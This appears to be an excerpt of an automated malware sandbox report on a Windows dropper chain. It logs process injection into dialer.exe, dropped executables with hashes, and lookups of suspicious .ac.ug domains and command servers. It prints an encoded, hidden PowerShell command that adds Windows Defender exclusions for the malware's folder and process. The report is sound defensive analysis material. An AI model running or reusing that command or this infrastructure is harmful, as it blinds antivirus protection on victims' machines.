PID 4800 wrote to memory of 4424 N/A C:\Users\Admin\AppData\Local\Temp\c0facaa9561e361afe9d92d38e2793a0.exe C:\Users\Admin\AppData\Local\Temp\c0facaa9561e361afe9d92d38e2793a0.exe
PID 4800 wrote to memory of 4424 N/A C:\Users\Admin\AppData\Local\Temp\c0facaa9561e361afe9d92d38e2793a0.exe C:\Users\Admin\AppData\Local\Temp\c0facaa9561e361afe9d92d38e2793a0.exe
PID 4800 wrote to memory of 4424 N/A C:\Users\Admin\AppData\Local\Temp\c0facaa9561e361afe9d92d38e2793a0.exe C:\Users\Admin\AppData\Local\Temp\c0facaa9561e361afe9d92d38e2793a0.exe
PID 896 wrote to memory of 3964 N/A C:\Users\Admin\AppData\Local\Temp\vctuacx.exe C:\Users\Admin\AppData\Local\Temp\vctuacx.exe
PID 896 wrote to memory of 3964 N/A C:\Users\Admin\AppData\Local\Temp\vctuacx.exe C:\Users\Admin\AppData\Local\Temp\vctuacx.exe
PID 896 wrote to memory of 3964 N/A C:\Users\Admin\AppData\Local\Temp\vctuacx.exe C:\Users\Admin\AppData\Local\Temp\vctuacx.exe
PID 896 wrote to memory of 3964 N/A C:\Users\Admin\AppData\Local\Temp\vctuacx.exe C:\Users\Admin\AppData\Local\Temp\vctuacx.exe
PID 3964 wrote to memory of 1172 N/A C:\Users\Admin\AppData\Local\Temp\vctuacx.exe C:\Users\Admin\AppData\Local\Temp\Dropakxa.exe
PID 3964 wrote to memory of 1172 N/A C:\Users\Admin\AppData\Local\Temp\vctuacx.exe C:\Users\Admin\AppData\Local\Temp\Dropakxa.exe
PID 3964 wrote to memory of 1172 N/A C:\Users\Admin\AppData\Local\Temp\vctuacx.exe C:\Users\Admin\AppData\Local\Temp\Dropakxa.exe
PID 1172 wrote to memory of 2024 N/A C:\Users\Admin\AppData\Local\Temp\Dropakxa.exe C:\Users\Admin\AppData\Local\Temp\BBLb.exe
PID 1172 wrote to memory of 2024 N/A C:\Users\Admin\AppData\Local\Temp\Dropakxa.exe C:\Users\Admin\AppData\Local\Temp\BBLb.exe
PID 1172 wrote to memory of 2024 N/A C:\Users\Admin\AppData\Local\Temp\Dropakxa.exe C:\Users\Admin\AppData\Local\Temp\BBLb.exe
PID 1172 wrote to memory of 4548 N/A C:\Users\Admin\AppData\Local\Temp\Dropakxa.exe C:\Users\Admin\AppData\Local\Temp\Dropakxa.exe
PID 1172 wrote to memory of 4548 N/A C:\Users\Admin\AppData\Local\Temp\Dropakxa.exe C:\Users\Admin\AppData\Local\Temp\Dropakxa.exe
PID 1172 wrote to memory of 4548 N/A C:\Users\Admin\AppData\Local\Temp\Dropakxa.exe C:\Users\Admin\AppData\Local\Temp\Dropakxa.exe
PID 1172 wrote to memory of 1784 N/A C:\Users\Admin\AppData\Local\Temp\Dropakxa.exe C:\Users\Admin\AppData\Local\Temp\Dropakxa.exe
PID 1172 wrote to memory of 1784 N/A C:\Users\Admin\AppData\Local\Temp\Dropakxa.exe C:\Users\Admin\AppData\Local\Temp\Dropakxa.exe
PID 1172 wrote to memory of 1784 N/A C:\Users\Admin\AppData\Local\Temp\Dropakxa.exe C:\Users\Admin\AppData\Local\Temp\Dropakxa.exe
PID 1172 wrote to memory of 1784 N/A C:\Users\Admin\AppData\Local\Temp\Dropakxa.exe C:\Users\Admin\AppData\Local\Temp\Dropakxa.exe
PID 1172 wrote to memory of 1784 N/A C:\Users\Admin\AppData\Local\Temp\Dropakxa.exe C:\Users\Admin\AppData\Local\Temp\Dropakxa.exe
PID 1172 wrote to memory of 1784 N/A C:\Users\Admin\AppData\Local\Temp\Dropakxa.exe C:\Users\Admin\AppData\Local\Temp\Dropakxa.exe
PID 1172 wrote to memory of 1784 N/A C:\Users\Admin\AppData\Local\Temp\Dropakxa.exe C:\Users\Admin\AppData\Local\Temp\Dropakxa.exe
PID 1172 wrote to memory of 1784 N/A C:\Users\Admin\AppData\Local\Temp\Dropakxa.exe C:\Users\Admin\AppData\Local\Temp\Dropakxa.exe
PID 1172 wrote to memory of 1784 N/A C:\Users\Admin\AppData\Local\Temp\Dropakxa.exe C:\Users\Admin\AppData\Local\Temp\Dropakxa.exe
PID 1172 wrote to memory of 1784 N/A C:\Users\Admin\AppData\Local\Temp\Dropakxa.exe C:\Users\Admin\AppData\Local\Temp\Dropakxa.exe
PID 1784 wrote to memory of 3224 N/A C:\Users\Admin\AppData\Local\Temp\Dropakxa.exe C:\Windows\SysWOW64\dialer.exe
PID 1784 wrote to memory of 3224 N/A C:\Users\Admin\AppData\Local\Temp\Dropakxa.exe C:\Windows\SysWOW64\dialer.exe
PID 1784 wrote to memory of 3224 N/A C:\Users\Admin\AppData\Local\Temp\Dropakxa.exe C:\Windows\SysWOW64\dialer.exe
PID 1784 wrote to memory of 3224 N/A C:\Users\Admin\AppData\Local\Temp\Dropakxa.exe C:\Windows\SysWOW64\dialer.exe
PID 1784 wrote to memory of 3224 N/A C:\Users\Admin\AppData\Local\Temp\Dropakxa.exe C:\Windows\SysWOW64\dialer.exe
PID 2024 wrote to memory of 2236 N/A C:\Users\Admin\AppData\Local\Temp\BBLb.exe C:\Users\Admin\AppData\Local\Temp\BBLb.exe
PID 2024 wrote to memory of 2236 N/A C:\Users\Admin\AppData\Local\Temp\BBLb.exe C:\Users\Admin\AppData\Local\Temp\BBLb.exe
PID 2024 wrote to memory of 2236 N/A C:\Users\Admin\AppData\Local\Temp\BBLb.exe C:\Users\Admin\AppData\Local\Temp\BBLb.exe
PID 2024 wrote to memory of 4068 N/A C:\Users\Admin\AppData\Local\Temp\BBLb.exe C:\Users\Admin\AppData\Local\Temp\BBLb.exe
PID 2024 wrote to memory of 4068 N/A C:\Users\Admin\AppData\Local\Temp\BBLb.exe C:\Users\Admin\AppData\Local\Temp\BBLb.exe
PID 2024 wrote to memory of 4068 N/A C:\Users\Admin\AppData\Local\Temp\BBLb.exe C:\Users\Admin\AppData\Local\Temp\BBLb.exe
PID 2024 wrote to memory of 4008 N/A C:\Users\Admin\AppData\Local\Temp\BBLb.exe C:\Users\Admin\AppData\Local\Temp\BBLb.exe
PID 2024 wrote to memory of 4008 N/A C:\Users\Admin\AppData\Local\Temp\BBLb.exe C:\Users\Admin\AppData\Local\Temp\BBLb.exe
PID 2024 wrote to memory of 4008 N/A C:\Users\Admin\AppData\Local\Temp\BBLb.exe C:\Users\Admin\AppData\Local\Temp\BBLb.exe
PID 2024 wrote to memory of 4008 N/A C:\Users\Admin\AppData\Local\Temp\BBLb.exe C:\Users\Admin\AppData\Local\Temp\BBLb.exe
PID 2024 wrote to memory of 4008 N/A C:\Users\Admin\AppData\Local\Temp\BBLb.exe C:\Users\Admin\AppData\Local\Temp\BBLb.exe
PID 2024 wrote to memory of 4008 N/A C:\Users\Admin\AppData\Local\Temp\BBLb.exe C:\Users\Admin\AppData\Local\Temp\BBLb.exe
PID 2024 wrote to memory of 4008 N/A C:\Users\Admin\AppData\Local\Temp\BBLb.exe C:\Users\Admin\AppData\Local\Temp\BBLb.exe
PID 2024 wrote to memory of 4008 N/A C:\Users\Admin\AppData\Local\Temp\BBLb.exe C:\Users\Admin\AppData\Local\Temp\BBLb.exe
PID 3244 wrote to memory of 5040 N/A C:\Users\Admin\AppData\Local\TypeId\dylawcqb\AttributeString.exe C:\Users\Admin\AppData\Local\TypeId\dylawcqb\AttributeString.exe
PID 3244 wrote to memory of 5040 N/A C:\Users\Admin\AppData\Local\TypeId\dylawcqb\AttributeString.exe C:\Users\Admin\AppData\Local\TypeId\dylawcqb\AttributeString.exe
PID 3244 wrote to memory of 5040 N/A C:\Users\Admin\AppData\Local\TypeId\dylawcqb\AttributeString.exe C:\Users\Admin\AppData\Local\TypeId\dylawcqb\AttributeString.exe
PID 3244 wrote to memory of 1368 N/A C:\Users\Admin\AppData\Local\TypeId\dylawcqb\AttributeString.exe C:\Users\Admin\AppData\Local\TypeId\dylawcqb\AttributeString.exe
PID 3244 wrote to memory of 1368 N/A C:\Users\Admin\AppData\Local\TypeId\dylawcqb\AttributeString.exe C:\Users\Admin\AppData\Local\TypeId\dylawcqb\AttributeString.exe
PID 3244 wrote to memory of 1368 N/A C:\Users\Admin\AppData\Local\TypeId\dylawcqb\AttributeString.exe C:\Users\Admin\AppData\Local\TypeId\dylawcqb\AttributeString.exe
PID 3244 wrote to memory of 1368 N/A C:\Users\Admin\AppData\Local\TypeId\dylawcqb\AttributeString.exe C:\Users\Admin\AppData\Local\TypeId\dylawcqb\AttributeString.exe
PID 3244 wrote to memory of 1368 N/A C:\Users\Admin\AppData\Local\TypeId\dylawcqb\AttributeString.exe C:\Users\Admin\AppData\Local\TypeId\dylawcqb\AttributeString.exe
PID 3244 wrote to memory of 1368 N/A C:\Users\Admin\AppData\Local\TypeId\dylawcqb\AttributeString.exe C:\Users\Admin\AppData\Local\TypeId\dylawcqb\AttributeString.exe
PID 3244 wrote to memory of 1368 N/A C:\Users\Admin\AppData\Local\TypeId\dylawcqb\AttributeString.exe C:\Users\Admin\AppData\Local\TypeId\dylawcqb\AttributeString.exe
PID 3244 wrote to memory of 1368 N/A C:\Users\Admin\AppData\Local\TypeId\dylawcqb\AttributeString.exe C:\Users\Admin\AppData\Local\TypeId\dylawcqb\AttributeString.exe
PID 3964 wrote to memory of 1288 N/A C:\Users\Admin\AppData\Local\Temp\vctuacx.exe C:\Users\Admin\AppData\Local\Temp\DropaDkxa.exe
PID 3964 wrote to memory of 1288 N/A C:\Users\Admin\AppData\Local\Temp\vctuacx.exe C:\Users\Admin\AppData\Local\Temp\DropaDkxa.exe
PID 3964 wrote to memory of 1288 N/A C:\Users\Admin\AppData\Local\Temp\vctuacx.exe C:\Users\Admin\AppData\Local\Temp\DropaDkxa.exe
PID 1288 wrote to memory of 1552 N/A C:\Users\Admin\AppData\Local\Temp\DropaDkxa.exe C:\Users\Admin\AppData\Local\Temp\DropaDkxa.exe

Processes

C:\Windows\system32\sihost.exe

sihost.exe

C:\Users\Admin\AppData\Local\Temp\c0facaa9561e361afe9d92d38e2793a0.exe

"C:\Users\Admin\AppData\Local\Temp\c0facaa9561e361afe9d92d38e2793a0.exe"

C:\Users\Admin\AppData\Local\Temp\vctuacx.exe

"C:\Users\Admin\AppData\Local\Temp\vctuacx.exe"

C:\Users\Admin\AppData\Local\Temp\c0facaa9561e361afe9d92d38e2793a0.exe

"C:\Users\Admin\AppData\Local\Temp\c0facaa9561e361afe9d92d38e2793a0.exe"

C:\Users\Admin\AppData\Local\Temp\vctuacx.exe

"C:\Users\Admin\AppData\Local\Temp\vctuacx.exe"

C:\Windows\system32\AUDIODG.EXE

C:\Windows\system32\AUDIODG.EXE 0x514 0x518

C:\Users\Admin\AppData\Local\Temp\Dropakxa.exe

"C:\Users\Admin\AppData\Local\Temp\Dropakxa.exe" 0

C:\Users\Admin\AppData\Local\Temp\BBLb.exe

"C:\Users\Admin\AppData\Local\Temp\BBLb.exe"

C:\Users\Admin\AppData\Local\Temp\Dropakxa.exe

C:\Users\Admin\AppData\Local\Temp\Dropakxa.exe

C:\Users\Admin\AppData\Local\Temp\Dropakxa.exe

C:\Users\Admin\AppData\Local\Temp\Dropakxa.exe

C:\Windows\SysWOW64\dialer.exe

"C:\Windows\system32\dialer.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 452 -p 1784 -ip 1784

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1784 -s 448

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 1784 -ip 1784

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1784 -s 480

C:\Users\Admin\AppData\Local\Temp\BBLb.exe

C:\Users\Admin\AppData\Local\Temp\BBLb.exe

C:\Users\Admin\AppData\Local\Temp\BBLb.exe

C:\Users\Admin\AppData\Local\Temp\BBLb.exe

C:\Users\Admin\AppData\Local\Temp\BBLb.exe

C:\Users\Admin\AppData\Local\Temp\BBLb.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAEEAZABtAGkAbgBcAEEAcABwAEQAYQB0AGEAXABMAG8AYwBhAGwAOwAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAcgBvAGMAZQBzAHMAIABBAHQAdAByAGkAYgB1AHQAZQBTAHQAcgBpAG4AZwAuAGUAeABlADsA

C:\Users\Admin\AppData\Local\TypeId\dylawcqb\AttributeString.exe

C:\Users\Admin\AppData\Local\TypeId\dylawcqb\AttributeString.exe

C:\Users\Admin\AppData\Local\TypeId\dylawcqb\AttributeString.exe

C:\Users\Admin\AppData\Local\TypeId\dylawcqb\AttributeString.exe

C:\Users\Admin\AppData\Local\TypeId\dylawcqb\AttributeString.exe

C:\Users\Admin\AppData\Local\TypeId\dylawcqb\AttributeString.exe

C:\Users\Admin\AppData\Local\Temp\DropaDkxa.exe

"C:\Users\Admin\AppData\Local\Temp\DropaDkxa.exe" 0

C:\Users\Admin\AppData\Local\Temp\DropaDkxa.exe

C:\Users\Admin\AppData\Local\Temp\DropaDkxa.exe

C:\Users\Admin\AppData\Local\Temp\DropaDkxa.exe

C:\Users\Admin\AppData\Local\Temp\DropaDkxa.exe

C:\Users\Admin\AppData\Local\Temp\DropaDkxa.exe

C:\Users\Admin\AppData\Local\Temp\DropaDkxa.exe

C:\Users\Admin\AppData\Local\Temp\DropaDkxa.exe

C:\Users\Admin\AppData\Local\Temp\DropaDkxa.exe

C:\Windows\SysWOW64\dialer.exe

"C:\Windows\system32\dialer.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 476 -p 1452 -ip 1452

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1452 -s 420

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 384 -p 1452 -ip 1452

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1452 -s 452

C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAEEAZABtAGkAbgBcAEEAcABwAEQAYQB0AGEAXABMAG8AYwBhAGwAOwAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAcgBvAGMAZQBzAHMAIABBAHQAdAByAGkAYgB1AHQAZQBTAHQAcgBpAG4AZwAuAGUAeABlADsA

Network

Country Destination Domain Proto
US 8.8.8.8:53 241.150.49.20.in-addr.arpa udp
US 8.8.8.8:53 74.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 209.178.17.96.in-addr.arpa udp
US 8.8.8.8:53 241.154.82.20.in-addr.arpa udp
US 8.8.8.8:53 41.110.16.96.in-addr.arpa udp
US 8.8.8.8:53 hubvera.ac.ug udp
RU 91.215.85.223:80 hubvera.ac.ug tcp
US 8.8.8.8:53 g.bing.com udp
US 8.8.8.8:53 223.85.215.91.in-addr.arpa udp
US 204.79.197.200:443 g.bing.com tcp
US 8.8.8.8:53 217.106.137.52.in-addr.arpa udp
US 8.8.8.8:53 ddlakava.ac.ug udp
US 8.8.8.8:53 bit.do udp
US 23.21.31.78:80 bit.do tcp
US 8.8.8.8:53 13.86.106.20.in-addr.arpa udp
US 8.8.8.8:53 86.23.85.13.in-addr.arpa udp
US 8.8.8.8:53 196.249.167.52.in-addr.arpa udp
US 8.8.8.8:53 206.23.85.13.in-addr.arpa udp
US 8.8.8.8:53 217.135.221.88.in-addr.arpa udp
US 23.21.31.78:80 bit.do tcp
US 8.8.8.8:53 rebrand.ly udp
US 3.33.143.57:80 rebrand.ly tcp
US 8.8.8.8:53 fran.ac.ug udp
US 8.8.8.8:53 fransceysse.ac.ug udp
US 8.8.8.8:53 57.143.33.3.in-addr.arpa udp
US 8.8.8.8:53 tinyurl.com udp
US 104.20.139.65:80 tinyurl.com tcp
US 8.8.8.8:53 kode.ac.ug udp
US 8.8.8.8:53 kodekode.ac.ug udp
US 8.8.8.8:53 tuekisa.ac.ug udp
US 8.8.8.8:53 partadino.ac.ug udp
US 8.8.8.8:53 65.139.20.104.in-addr.arpa udp
RU 91.215.85.223:80 partadino.ac.ug tcp
US 8.8.8.8:53 markinda.xyz udp
US 8.8.8.8:53 markinda.top udp
US 23.21.31.78:80 bit.do tcp
US 8.8.8.8:53 48.229.111.52.in-addr.arpa udp
US 23.21.31.78:80 bit.do tcp
US 8.8.8.8:53 nickshort.ug udp
US 8.8.8.8:53 kodedea.ug udp
US 8.8.8.8:53 junks.ac.ug udp
NL 94.156.69.145:58001 junks.ac.ug tcp
US 8.8.8.8:53 movescx.top udp
NL 94.156.69.145:58002 junks.ac.ug tcp
US 8.8.8.8:53 cointra.ac.ug udp
US 8.8.8.8:53 muylove.ac.ug udp
US 8.8.8.8:53 partiad.top udp
US 8.8.8.8:53 partiad.xyz udp
US 8.8.8.8:53 205.47.74.20.in-addr.arpa udp
US 8.8.8.8:53 tse1.mm.bing.net udp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
NL 94.156.69.145:58003 junks.ac.ug tcp
US 8.8.8.8:53 66.112.168.52.in-addr.arpa udp

Files

memory/4800-2-0x00000000770E2000-0x00000000770E3000-memory.dmp

memory/4800-3-0x00000000006D0000-0x00000000006D1000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\vctuacx.exe

MD5 d6bfa5d4d5d67dd73013e5b400cac2e7
SHA1 725f7fec0fd1f245c44ab1c228cd349a5e12bd71
SHA256 fa40dc2c8055f953099d7d354ba97fbf3a5f3aa501ce95cb8cefa810b80ea5d4
SHA512 e5d58b64de4d398290d0cd79d44a516ca2528bd183566926ea1f3b9211b20fa5c2244bcc8bd3cc1f3b1d470dc257b72b8d3530d682fff00b7b52227c6c3c7808

memory/896-17-0x00000000005F0000-0x00000000005F1000-memory.dmp

memory/4800-18-0x0000000003300000-0x0000000003307000-memory.dmp

memory/4424-19-0x0000000000400000-0x0000000000667000-memory.dmp

memory/4424-21-0x0000000000400000-0x0000000000667000-memory.dmp

memory/4424-22-0x0000000000400000-0x0000000000667000-memory.dmp

memory/3964-20-0x0000000000400000-0x0000000000409000-memory.dmp

memory/4424-23-0x0000000000400000-0x0000000000663000-memory.dmp

memory/3964-27-0x0000000000400000-0x0000000000409000-memory.dmp

memory/4424-29-0x0000000000400000-0x0000000000667000-memory.dmp

memory/4424-28-0x00000000770E2000-0x00000000770E3000-memory.dmp

memory/3964-31-0x00000000770E2000-0x00000000770E3000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\bassmod.dll

MD5 e3a6587ba5a4ee4514ecaa4265dd9b2c
SHA1 b44bb9b5fc3478fa6ea5140603857ee0c2d4c4fd
SHA256 566934a049ae41fe36e2e122825875e5c02d4db083e744a7a3c94f456cec2f94
SHA512 90f4e5ceac00a0815452ef951feb3aa29e6ef408d8d4cda023c3fdd49ba0238e06589cee9cc0be842eddd1b02bd1d448d9ab8bdaed70651b38d6074c9f99d22f

memory/3964-33-0x0000000000580000-0x0000000000581000-memory.dmp

memory/4424-36-0x0000000000030000-0x0000000000031000-memory.dmp

memory/4424-37-0x0000000010000000-0x000000001002F000-memory.dmp

memory/4424-39-0x0000000000F30000-0x0000000000F31000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\Dropakxa.exe

MD5 1a917a85dcbb1d3df5f4dd02e3a62873
SHA1 567f528fec8e7a4787f8c253446d8f1b620dc9d6
SHA256 217fbf967c95d1359314fcd53ae8d04489eb3c7bdc1f22110d5a8a476d1fc92e
SHA512 341acbd43efac1718c7f3e3795549acf29237a2675bdadcb7e52ce18aac6dcc6ae628e1b6edfa2338ed6d9923c148cb4322c75fad86d5c0e6f2327c2270563ec

memory/1172-55-0x0000000000FB0000-0x00000000011D8000-memory.dmp

memory/1172-56-0x0000000071F10000-0x00000000726C0000-memory.dmp

memory/1172-57-0x0000000005B70000-0x0000000005D78000-memory.dmp

memory/1172-58-0x0000000005B70000-0x0000000005D73000-memory.dmp

memory/1172-59-0x0000000005B70000-0x0000000005D73000-memory.dmp

memory/1172-61-0x0000000005B70000-0x0000000005D73000-memory.dmp

memory/1172-65-0x0000000005B70000-0x0000000005D73000-memory.dmp

memory/1172-69-0x0000000005B70000-0x0000000005D73000-memory.dmp

memory/1172-67-0x0000000005B70000-0x0000000005D73000-memory.dmp

memory/1172-71-0x0000000005B70000-0x0000000005D73000-memory.dmp

memory/1172-73-0x0000000005B70000-0x0000000005D73000-memory.dmp

memory/1172-75-0x0000000005B70000-0x0000000005D73000-memory.dmp

memory/1172-79-0x0000000005B70000-0x0000000005D73000-memory.dmp

memory/1172-81-0x0000000005B70000-0x0000000005D73000-memory.dmp

memory/1172-83-0x0000000005B70000-0x0000000005D73000-memory.dmp

memory/1172-85-0x0000000005B70000-0x0000000005D73000-memory.dmp

memory/1172-87-0x0000000005B70000-0x0000000005D73000-memory.dmp

memory/1172-89-0x0000000005B70000-0x0000000005D73000-memory.dmp

memory/1172-91-0x0000000005B70000-0x0000000005D73000-memory.dmp

memory/1172-95-0x0000000005B70000-0x0000000005D73000-memory.dmp

memory/1172-97-0x0000000005B70000-0x0000000005D73000-memory.dmp

memory/1172-93-0x0000000005B70000-0x0000000005D73000-memory.dmp

memory/1172-99-0x0000000005B70000-0x0000000005D73000-memory.dmp

memory/1172-77-0x0000000005B70000-0x0000000005D73000-memory.dmp

memory/1172-101-0x0000000005B70000-0x0000000005D73000-memory.dmp

memory/1172-103-0x0000000005B70000-0x0000000005D73000-memory.dmp

memory/1172-63-0x0000000005B70000-0x0000000005D73000-memory.dmp

memory/1172-105-0x0000000005B70000-0x0000000005D73000-memory.dmp

memory/1172-107-0x0000000005B70000-0x0000000005D73000-memory.dmp

memory/1172-111-0x0000000005B70000-0x0000000005D73000-memory.dmp

memory/1172-109-0x0000000005B70000-0x0000000005D73000-memory.dmp

memory/4424-933-0x0000000000400000-0x0000000000663000-memory.dmp

memory/4424-994-0x0000000000400000-0x0000000000667000-memory.dmp

memory/1172-995-0x0000000005B60000-0x0000000005B70000-memory.dmp

memory/1172-996-0x0000000005A00000-0x0000000005A01000-memory.dmp

memory/1172-998-0x0000000005AB0000-0x0000000005AFC000-memory.dmp

memory/1172-997-0x0000000005E80000-0x0000000006020000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\BBLb.exe

MD5 71eb1bc6e6da380c1cb552d78b391b2a
SHA1 df3278e6e26d8c0bc878fe0a8c8a91b28c5a652d
SHA256 cefa92ee6cc2fad86c49dd37d57ff8afcb9b9abef0a110689e6d771394256bd6
SHA512 d6fab2c469924b8202f7964e864f66d6b6151937c8d134fb40e1f1d3787cf22328892c3f7209786e0b42e1abd5ca71a61f40538ef1e93534d2a98bf6d4448e90

memory/3964-1012-0x0000000000400000-0x0000000000409000-memory.dmp

memory/2024-1020-0x0000000071F10000-0x00000000726C0000-memory.dmp

memory/4424-1022-0x0000000010000000-0x000000001002F000-memory.dmp

memory/2024-1025-0x00000000054A0000-0x00000000054B0000-memory.dmp

memory/1784-1027-0x0000000000400000-0x0000000000488000-memory.dmp

memory/1172-1021-0x0000000071F10000-0x00000000726C0000-memory.dmp

memory/2024-1019-0x0000000005520000-0x000000000564A000-memory.dmp

memory/2024-1013-0x0000000005350000-0x0000000005478000-memory.dmp

memory/1172-1011-0x0000000008280000-0x0000000008824000-memory.dmp

memory/2024-1010-0x0000000000A50000-0x0000000000B90000-memory.dmp

memory/1784-1289-0x0000000003E80000-0x0000000004280000-memory.dmp

memory/1784-1295-0x0000000003E80000-0x0000000004280000-memory.dmp

memory/3224-1313-0x0000000002B90000-0x0000000002F90000-memory.dmp

memory/3224-1317-0x0000000002B90000-0x0000000002F90000-memory.dmp

memory/3224-1341-0x0000000002B90000-0x0000000002F90000-memory.dmp

memory/1784-1338-0x0000000003E80000-0x0000000004280000-memory.dmp

memory/2024-1975-0x0000000005490000-0x0000000005491000-memory.dmp

memory/2024-1976-0x00000000058B0000-0x0000000005970000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\BBLb.exe.log

MD5 4a911455784f74e368a4c2c7876d76f4
SHA1 a1700a0849ffb4f26671eb76da2489946b821c34
SHA256 264098e15b5b33d425f3b76e45b7976b58f917048125041135f7e60d8151108c
SHA512 4617591400409e1930195795a55e20d5f063042bb3e9fd1955099066e507b6ac8a1e3ae54cc42418e2639149b31bf7e58cd5743670d9030a15e29f14d813815d

memory/2024-1984-0x0000000071F10000-0x00000000726C0000-memory.dmp

memory/4008-1983-0x0000000000400000-0x000000000049C000-memory.dmp

memory/4008-1988-0x0000000005480000-0x0000000005568000-memory.dmp

memory/4008-1989-0x0000000071F10000-0x00000000726C0000-memory.dmp

memory/4008-1990-0x0000000005640000-0x0000000005650000-memory.dmp

memory/4008-4191-0x00000000056C0000-0x0000000005716000-memory.dmp

memory/4008-4192-0x0000000005940000-0x00000000059A6000-memory.dmp

memory/4008-4193-0x0000000005D60000-0x0000000005DB4000-memory.dmp

memory/4008-4195-0x0000000071F10000-0x00000000726C0000-memory.dmp

memory/3624-4199-0x00007FFF6BFE0000-0x00007FFF6CAA1000-memory.dmp

memory/3624-4200-0x0000021D1AB10000-0x0000021D1AB20000-memory.dmp

memory/3624-4201-0x0000021D1AB10000-0x0000021D1AB20000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_cvgevfn0.ps1.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/3624-4207-0x0000021D02510000-0x0000021D02532000-memory.dmp

memory/3624-4214-0x00007FFF6BFE0000-0x00007FFF6CAA1000-memory.dmp

memory/3244-4224-0x00000000052E0000-0x00000000052F0000-memory.dmp

memory/3244-4223-0x0000000071F10000-0x00000000726C0000-memory.dmp

memory/3244-5161-0x0000000002AD0000-0x0000000002AD1000-memory.dmp

memory/3244-5167-0x0000000071F10000-0x00000000726C0000-memory.dmp

memory/1368-5168-0x0000000071F10000-0x00000000726C0000-memory.dmp

memory/1368-5169-0x00000000059F0000-0x0000000005A00000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\DropaDkxa.exe

MD5 20d8bc77b286c2c0de4347d356f8bc0f
SHA1 10f4664c0361b0dc1f37c6b393f451b9ff836f11
SHA256 a10a6603774bfd2623aa256882b47fa5480ea216ba3f99a23d8c96bb77e96247
SHA512 96d64b2c24e36c1245d4986aa129a78bb13417efa95e712b590f4332853f2f04d1d731dec82d062b39f7b5043da81ccc91de91141dc0ffe0dbd0c4f68a698819

C:\Users\Admin\AppData\Local\Temp\DropaDkxa.exe

MD5 7d4777ed6d9818a912c0cefc9f12dcfc
SHA1 48001b580d7a36f39823fd391411b3a32e39faba
SHA256 6862447b716d9ebac197fad0eda503fc81576fd86de9871dbfb82586b60751f6
SHA512 b898461eb44a0dd1958581a0e0cbb18b7d5ba88dcfc652bea73d84361936c1a90c40aacb4c3bf4dbfe424ddf441460c5342a5b5acb5f6605d355cefc62890414

memory/1288-6326-0x0000000071F10000-0x00000000726C0000-memory.dmp

memory/1288-7304-0x0000000005090000-0x00000000050A0000-memory.dmp

memory/1288-7305-0x0000000002B30000-0x0000000002B31000-memory.dmp

memory/1288-7352-0x0000000071F10000-0x00000000726C0000-memory.dmp

memory/1452-7767-0x0000000003F90000-0x0000000004390000-memory.dmp

memory/1368-7780-0x0000000071F10000-0x00000000726C0000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 d85ba6ff808d9e5444a4b369f5bc2730
SHA1 31aa9d96590fff6981b315e0b391b575e4c0804a
SHA256 84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f
SHA512 8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 6d3e9c29fe44e90aae6ed30ccf799ca8
SHA1 c7974ef72264bbdf13a2793ccf1aed11bc565dce
